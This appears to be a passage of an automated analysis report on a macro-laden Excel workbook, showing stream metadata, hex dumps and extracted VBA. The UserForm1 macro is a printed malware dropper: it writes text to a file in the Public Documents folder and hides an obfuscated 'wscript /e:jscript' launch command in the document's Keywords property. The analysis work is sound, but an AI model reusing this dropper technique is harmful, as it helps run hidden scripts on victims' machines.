                                                                                                                                                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 f5 bd 71 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                          VBA Code Keywords

                                                                                                                                                          Keyword
                                                                                                                                                          False
                                                                                                                                                          VB_Exposed
                                                                                                                                                          Attribute
                                                                                                                                                          VB_Name
                                                                                                                                                          VB_Creatable
                                                                                                                                                          VB_PredeclaredId
                                                                                                                                                          VB_GlobalNameSpace
                                                                                                                                                          VB_Base
                                                                                                                                                          VB_Customizable
                                                                                                                                                          VB_TemplateDerived
                                                                                                                                                          VBA Code
                                                                                                                                                          Attribute VB_Name = "Sheet3"
                                                                                                                                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                                                                                          Attribute VB_Creatable = False
                                                                                                                                                          Attribute VB_PredeclaredId = True
                                                                                                                                                          Attribute VB_Exposed = True
                                                                                                                                                          Attribute VB_TemplateDerived = False
                                                                                                                                                          Attribute VB_Customizable = True
                                                                                                                                                          VBA File Name: Sheet4.cls, Stream Size: 977
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet4
                                                                                                                                                          VBA File Name:Sheet4.cls
                                                                                                                                                          Stream Size:977
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . c . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 f5 63 fc 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                          VBA Code Keywords

                                                                                                                                                          Keyword
                                                                                                                                                          False
                                                                                                                                                          VB_Exposed
                                                                                                                                                          Attribute
                                                                                                                                                          VB_Name
                                                                                                                                                          VB_Creatable
                                                                                                                                                          VB_PredeclaredId
                                                                                                                                                          VB_GlobalNameSpace
                                                                                                                                                          VB_Base
                                                                                                                                                          VB_Customizable
                                                                                                                                                          VB_TemplateDerived
                                                                                                                                                          VBA Code
                                                                                                                                                          Attribute VB_Name = "Sheet4"
                                                                                                                                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                                                                                          Attribute VB_Creatable = False
                                                                                                                                                          Attribute VB_PredeclaredId = True
                                                                                                                                                          Attribute VB_Exposed = True
                                                                                                                                                          Attribute VB_TemplateDerived = False
                                                                                                                                                          Attribute VB_Customizable = True
                                                                                                                                                          VBA File Name: Sheet5.cls, Stream Size: 977
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet5
                                                                                                                                                          VBA File Name:Sheet5.cls
                                                                                                                                                          Stream Size:977
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - b . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 f5 2d 62 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                          VBA Code Keywords

                                                                                                                                                          Keyword
                                                                                                                                                          False
                                                                                                                                                          VB_Exposed
                                                                                                                                                          Attribute
                                                                                                                                                          VB_Name
                                                                                                                                                          VB_Creatable
                                                                                                                                                          VB_PredeclaredId
                                                                                                                                                          VB_GlobalNameSpace
                                                                                                                                                          VB_Base
                                                                                                                                                          VB_Customizable
                                                                                                                                                          VB_TemplateDerived
                                                                                                                                                          VBA Code
                                                                                                                                                          Attribute VB_Name = "Sheet5"
                                                                                                                                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                                                                                          Attribute VB_Creatable = False
                                                                                                                                                          Attribute VB_PredeclaredId = True
                                                                                                                                                          Attribute VB_Exposed = True
                                                                                                                                                          Attribute VB_TemplateDerived = False
                                                                                                                                                          Attribute VB_Customizable = True
                                                                                                                                                          VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                                          VBA File Name:ThisWorkbook.cls
                                                                                                                                                          Stream Size:985
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 f5 ab 7f 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                          VBA Code Keywords

                                                                                                                                                          Keyword
                                                                                                                                                          False
                                                                                                                                                          VB_Exposed
                                                                                                                                                          Attribute
                                                                                                                                                          VB_Name
                                                                                                                                                          VB_Creatable
                                                                                                                                                          "ThisWorkbook"
                                                                                                                                                          VB_PredeclaredId
                                                                                                                                                          VB_GlobalNameSpace
                                                                                                                                                          VB_Base
                                                                                                                                                          VB_Customizable
                                                                                                                                                          VB_TemplateDerived
                                                                                                                                                          VBA Code
                                                                                                                                                          Attribute VB_Name = "ThisWorkbook"
                                                                                                                                                          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                                                                                          Attribute VB_Creatable = False
                                                                                                                                                          Attribute VB_PredeclaredId = True
                                                                                                                                                          Attribute VB_Exposed = True
                                                                                                                                                          Attribute VB_TemplateDerived = False
                                                                                                                                                          Attribute VB_Customizable = True
                                                                                                                                                          VBA File Name: UserForm1.frm, Stream Size: 2834
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/UserForm1
                                                                                                                                                          VBA File Name:UserForm1.frm
                                                                                                                                                          Stream Size:2834
                                                                                                                                                          Data ASCII:. . . . . . . . . 0 . . . . . . . t . . . . . . . 8 . . . . . . . . . . . . . . . . . ^ R . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:01 16 01 00 01 f0 00 00 00 30 04 00 00 d4 00 00 00 74 02 00 00 ff ff ff ff 38 04 00 00 e0 07 00 00 00 00 00 00 01 00 00 00 a7 f5 5e 52 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                          VBA Code Keywords

                                                                                                                                                          Keyword
                                                                                                                                                          #FileNumber
                                                                                                                                                          requirement
                                                                                                                                                          Close
                                                                                                                                                          Error
                                                                                                                                                          VB_Name
                                                                                                                                                          VB_Creatable
                                                                                                                                                          /one"
                                                                                                                                                          VB_Exposed
                                                                                                                                                          xFileName
                                                                                                                                                          Print
                                                                                                                                                          FileNumber
                                                                                                                                                          Empty
                                                                                                                                                          String
                                                                                                                                                          Resume
                                                                                                                                                          Variant
                                                                                                                                                          Output
                                                                                                                                                          "c:\Users\Public"
                                                                                                                                                          VB_Customizable
                                                                                                                                                          #FileNumber,
                                                                                                                                                          ":jsoncronipont
                                                                                                                                                          Replace("wsconroniponton
                                                                                                                                                          "\Documents\"
                                                                                                                                                          Range
                                                                                                                                                          Dir(Path)
                                                                                                                                                          Integer
                                                                                                                                                          DelimChar
                                                                                                                                                          VB_TemplateDerived
                                                                                                                                                          False
                                                                                                                                                          ThisWorkbook.BuiltinDocumentProperties("Keywords")
                                                                                                                                                          Attribute
                                                                                                                                                          Debug.Print
                                                                                                                                                          Private
                                                                                                                                                          VB_PredeclaredId
                                                                                                                                                          VB_GlobalNameSpace
                                                                                                                                                          VB_Base
                                                                                                                                                          'Change
                                                                                                                                                          FreeFile
                                                                                                                                                          strFileExists
                                                                                                                                                          VBA Code
                                                                                                                                                          Attribute VB_Name = "UserForm1"
                                                                                                                                                          Attribute VB_Base = "0{C840727C-B23E-46C1-9026-1DED0360EC96}{F47D3FAE-BB8B-4706-8591-BD6CC07461DA}"
                                                                                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                                                                                          Attribute VB_Creatable = False
                                                                                                                                                          Attribute VB_PredeclaredId = True
                                                                                                                                                          Attribute VB_Exposed = False
                                                                                                                                                          Attribute VB_TemplateDerived = False
                                                                                                                                                          Attribute VB_Customizable = False
                                                                                                                                                          Private Sub TextBox1_Change()
                                                                                                                                                           Dim Path As String
                                                                                                                                                           Dim FileNumber As Integer
                                                                                                                                                           
                                                                                                                                                           Dim xFileName As Variant
                                                                                                                                                              Dim rng As Range
                                                                                                                                                              Dim DelimChar As String
                                                                                                                                                            On Error Resume Next
                                                                                                                                                           tgo = "on"
                                                                                                                                                           Path = "c:\Users\Public" & Empty & "\Documents\" & "25" & Empty  'Change the path as per your requirement
                                                                                                                                                           FileNumber = FreeFile
                                                                                                                                                           Open Path For Output As #FileNumber
                                                                                                                                                           Print #FileNumber, Me.TextBox1.Value
                                                                                                                                                           Close FileNumber
                                                                                                                                                          
                                                                                                                                                           ThisWorkbook.Sheets(2).Activate
                                                                                                                                                           ThisWorkbook.Sheets(2).Range("D50:IV666").Clear
                                                                                                                                                           
                                                                                                                                                              
                                                                                                                                                          strFileExists = Dir(Path)
                                                                                                                                                          
                                                                                                                                                             If strFileExists = "" Then
                                                                                                                                                                  Debug.Print "x"
                                                                                                                                                              Else
                                                                                                                                                                   
                                                                                                                                                           ThisWorkbook.BuiltinDocumentProperties("Keywords") = "w" & Replace("wsconroniponton /bon /one" & ":jsoncronipont ", tgo, "", 2) & Path
                                                                                                                                                          
                                                                                                                                                              End If
                                                                                                                                                           
                                                                                                                                                          End Sub

                                                                                                                                                          Streams

                                                                                                                                                          Stream Path: \x1CompObj, File Type: data, Stream Size: 107
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x1CompObj
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:107
                                                                                                                                                          Entropy:4.18482950044
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 424
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:424
                                                                                                                                                          Entropy:3.70704949759
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . x . . . . . . . . . . . ` . . . . . . . h . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . P m F b d w r 0 T u P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S o u r c e D
                                                                                                                                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 78 01 00 00 0b 00 00 00 01 00 00 00 60 00 00 00 02 00 00 00 68 00 00 00 0e 00 00 00 7c 00 00 00 0f 00 00 00 88 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00 16 00 00 00 b4 00 00 00
                                                                                                                                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 220
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x5SummaryInformation
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:220
                                                                                                                                                          Entropy:3.13229188015
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . v . . . . . . . . . . .
                                                                                                                                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 05 00 00 00 5c 00 00 00 08 00 00 00 68 00 00 00 12 00 00 00 74 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                                          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 39260
                                                                                                                                                          General
                                                                                                                                                          Stream Path:Workbook
                                                                                                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                          Stream Size:39260
                                                                                                                                                          Entropy:4.61059933587
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Data ASCII:. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8
                                                                                                                                                          Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c9 c0 01 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                          Stream Path: _SX_DB_CUR/0001, File Type: data, Stream Size: 16815
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_SX_DB_CUR/0001
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:16815
                                                                                                                                                          Entropy:2.76744715124
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . A u t h o r " . . . E # . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . P r o d u c t . . . . . . . . . . . . . A l i c e M u t t o n . . . . . . . A n i s e e d S y r u p . . . . . . . B o s t o n C r a b M e a t . . . . . . . C a m e m b e r t P i e r r o t . . . . . . . C h e f A n t o n ' s C a j u n S e a s o n i n g . . . . . . . C h e f A n t o n ' s G u m b o M i x . . . . . . . F i l o M i x . . . . . . . G o r
                                                                                                                                                          Data Raw:c6 00 1b 00 15 01 00 00 01 00 03 00 1c 07 06 00 06 00 00 00 01 00 06 00 00 41 75 74 68 6f 72 22 01 0c 00 45 23 01 9f f7 fc e2 40 00 00 00 00 c7 00 18 00 81 14 00 00 00 00 19 00 00 00 00 00 19 00 07 00 00 50 72 6f 64 75 63 74 bb 01 02 00 00 00 cd 00 0f 00 0c 00 00 41 6c 69 63 65 20 4d 75 74 74 6f 6e cd 00 10 00 0d 00 00 41 6e 69 73 65 65 64 20 53 79 72 75 70 cd 00 13 00 10 00 00 42
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 826
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Stream Size:826
                                                                                                                                                          Entropy:5.15315553776
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 4 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 5 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A
                                                                                                                                                          Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 176
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:176
                                                                                                                                                          Entropy:3.18343768922
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . S h e e t 4 . S . h . e . e . t . 4 . . . S h e e t 5 . S . h . e . e . t . 5 . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
                                                                                                                                                          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 53 68 65 65 74 34 00 53 00 68 00 65 00 65 00 74 00 34 00 00 00 53 68 65 65 74
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/UserForm1/\x1CompObj
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:97
                                                                                                                                                          Entropy:3.61064918306
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 291
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/UserForm1/\x3VBFrame
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Stream Size:291
                                                                                                                                                          Entropy:4.60170100243
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w n
                                                                                                                                                          Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/UserForm1/f, File Type: data, Stream Size: 171
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/UserForm1/f
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:171
                                                                                                                                                          Entropy:3.84288648278
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . $ . . . . . . . . . . . . . . . . . . } . . t . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . X . . . . . . . . . $ . . . . . . . . . . . . . 4 . . . . . . . T e x t B o x 1 O . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 1 . . " . . . { . . .
                                                                                                                                                          Data Raw:00 04 24 00 08 0c 10 0c 02 00 00 00 ff ff 00 00 02 00 00 00 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 02 00 00 00 58 00 00 00 00 82 01 00 00 00 24 00 e5 01 00 00 08 00 00 80 01 00 00 00 34 00 00 00 00 00 17 00 54 65 78 74 42 6f 78 31 4f 03 00 00 ca 05 00 00 00
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/UserForm1/o, File Type: data, Stream Size: 108
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/UserForm1/o
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:108
                                                                                                                                                          Entropy:3.31418568251
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . H . . . . . . ; . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . L a b e l 1 . . . . . . { . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . .
                                                                                                                                                          Data Raw:00 02 14 00 01 01 00 80 00 00 00 00 1b 48 00 ac ce 18 00 00 3b 0a 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 18 00 28 00 00 00 06 00 00 80 4c 61 62 65 6c 31 00 00 ec 09 00 00 7b 02 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4896
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:4896
                                                                                                                                                          Entropy:4.8370296249
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . .
                                                                                                                                                          Data Raw:cc 61 a3 00 00 01 00 ff 00 20 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1828
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:1828
